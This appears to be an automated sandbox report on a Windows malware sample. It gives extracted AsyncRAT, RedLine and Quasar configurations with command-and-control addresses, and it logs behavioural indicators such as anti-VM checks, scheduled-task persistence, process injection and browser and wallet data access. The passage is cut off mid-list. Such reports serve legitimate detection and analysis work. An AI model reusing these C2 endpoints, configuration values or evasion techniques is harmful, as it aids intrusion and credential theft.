Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/11/2022, 10:41
Static task
static1
Behavioral task
behavioral1
Sample
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Resource
win7-20220812-en
General
-
Target
BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
-
Size
584KB
-
MD5
8553f9793539d4d17c13e464d606d7dc
-
SHA1
a033d05b0c0a5b220fde15827b5c716fbec3b398
-
SHA256
bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
-
SHA512
2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
-
SSDEEP
6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config
Extracted
asyncrat
Ratatouille 0.1.0
Youtube
179.43.187.19:33
179.43.187.19:2525
179.43.187.19:4523
179.43.187.19:5555
sdhgamkfgae4-youtube
-
delay
3
-
install
true
-
install_file
$77-update.exe
-
install_folder
%AppData%
Extracted
redline
cheat
179.43.187.19:18875
Extracted
quasar
1.4.0
r77Version
179.43.187.19:2326
d6db683c-9b85-4417-b1a3-4ff8bec1d98b
-
encryption_key
83FE26AAD844F101036726AFCD7F28CF377D20AF
-
install_name
$77Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
$77Client
-
subdirectory
$77win
Signatures
-
Quasar payload 4 IoCs
resource yara_rule behavioral2/files/0x001b00000001da04-474.dat family_quasar behavioral2/files/0x001b00000001da04-475.dat family_quasar behavioral2/files/0x000500000001e828-491.dat family_quasar behavioral2/files/0x000500000001e828-493.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral2/files/0x0003000000000739-349.dat family_redline behavioral2/files/0x0003000000000739-352.dat family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 4780 created 4480 4780 WerFault.exe 41 PID 4792 created 3340 4792 WerFault.exe 62 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4292 created 592 4292 powershell.EXE 3 PID 2916 created 4480 2916 svchost.exe 41 PID 2916 created 3340 2916 svchost.exe 62 PID 1500 created 592 1500 powershell.EXE 3 PID 1500 created 592 1500 powershell.EXE 3 -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3084-139-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions $77-update.exe -
Executes dropped EXE 8 IoCs
pid Process 4320 $77-update.exe 5012 $77-update.exe 3808 $77-update.exe 3180 qzkzzp.exe 3092 lsnupy.exe 4288 sjtjny.exe 4484 jiyrgq.exe 4880 $77Client.exe -
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools $77-update.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion $77-update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion $77-update.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation $77-update.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe sjtjny.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe sjtjny.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 48 api.ipify.org 49 api.ipify.org -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum $77-update.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 $77-update.exe -
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\$77Client svchost.exe File opened for modification C:\Windows\system32\$77win jiyrgq.exe File opened for modification C:\Windows\system32\$77win $77Client.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\system32\$77win\$77Client.exe jiyrgq.exe File opened for modification C:\Windows\system32\$77win\$77Client.exe jiyrgq.exe File opened for modification C:\Windows\system32\$77win\$77Client.exe $77Client.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2328 set thread context of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 4320 set thread context of 3808 4320 $77-update.exe 98 PID 4292 set thread context of 3356 4292 powershell.EXE 111 PID 1500 set thread context of 1940 1500 powershell.EXE 127 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3096 3340 WerFault.exe 62 2168 4480 WerFault.exe 41 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1116 schtasks.exe 832 schtasks.exe 2164 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3784 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 4320 $77-update.exe 4320 $77-update.exe 1984 powershell.exe 3456 powershell.exe 3456 powershell.exe 1984 powershell.exe 2080 powershell.exe 2080 powershell.exe 3808 $77-update.exe 1500 powershell.EXE 4292 powershell.EXE 4292 powershell.EXE 1500 powershell.EXE 4292 powershell.EXE 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3356 dllhost.exe 3808 $77-update.exe 3356 dllhost.exe 3356 dllhost.exe 3096 WerFault.exe 3096 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe Token: SeDebugPrivilege 4320 $77-update.exe Token: SeDebugPrivilege 3808 $77-update.exe Token: SeDebugPrivilege 3808 $77-update.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 4292 powershell.EXE Token: SeDebugPrivilege 4292 powershell.EXE Token: SeDebugPrivilege 3356 dllhost.exe Token: SeDebugPrivilege 4080 powershell.exe Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeDebugPrivilege 3092 lsnupy.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 1940 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3464 Conhost.exe 1096 Conhost.exe 4844 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 2328 wrote to memory of 3084 2328 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 89 PID 3084 wrote to memory of 4312 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 90 PID 3084 wrote to memory of 4312 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 90 PID 3084 wrote to memory of 4312 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 90 PID 3084 wrote to memory of 2780 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 92 PID 3084 wrote to memory of 2780 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 92 PID 3084 wrote to memory of 2780 3084 BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe 92 PID 2780 wrote to memory of 3784 2780 cmd.exe 94 PID 2780 wrote to memory of 3784 2780 cmd.exe 94 PID 2780 wrote to memory of 3784 2780 cmd.exe 94 PID 4312 wrote to memory of 1116 4312 cmd.exe 95 PID 4312 wrote to memory of 1116 4312 cmd.exe 95 PID 4312 wrote to memory of 1116 4312 cmd.exe 95 PID 2780 wrote to memory of 4320 2780 cmd.exe 96 PID 2780 wrote to memory of 4320 2780 cmd.exe 96 PID 2780 wrote to memory of 4320 2780 cmd.exe 96 PID 4320 wrote to memory of 5012 4320 $77-update.exe 97 PID 4320 wrote to memory of 5012 4320 $77-update.exe 97 PID 4320 wrote to memory of 5012 4320 $77-update.exe 97 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 4320 wrote to memory of 3808 4320 $77-update.exe 98 PID 3808 wrote to memory of 1984 3808 $77-update.exe 99 PID 3808 wrote to memory of 1984 3808 $77-update.exe 99 PID 3808 wrote to memory of 1984 3808 $77-update.exe 99 PID 3808 wrote to memory of 3456 3808 $77-update.exe 101 PID 3808 wrote to memory of 3456 3808 $77-update.exe 101 PID 3808 wrote to memory of 3456 3808 $77-update.exe 101 PID 3808 wrote to memory of 1668 3808 $77-update.exe 103 PID 3808 wrote to memory of 1668 3808 $77-update.exe 103 PID 3808 wrote to memory of 1668 3808 $77-update.exe 103 PID 1668 wrote to memory of 2080 1668 cmd.exe 105 PID 1668 wrote to memory of 2080 1668 cmd.exe 105 PID 1668 wrote to memory of 2080 1668 cmd.exe 105 PID 2080 wrote to memory of 3180 2080 powershell.exe 106 PID 2080 wrote to memory of 3180 2080 powershell.exe 106 PID 2080 wrote to memory of 3180 2080 powershell.exe 106 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 111 PID 4292 wrote to memory of 3356 4292 powershell.EXE 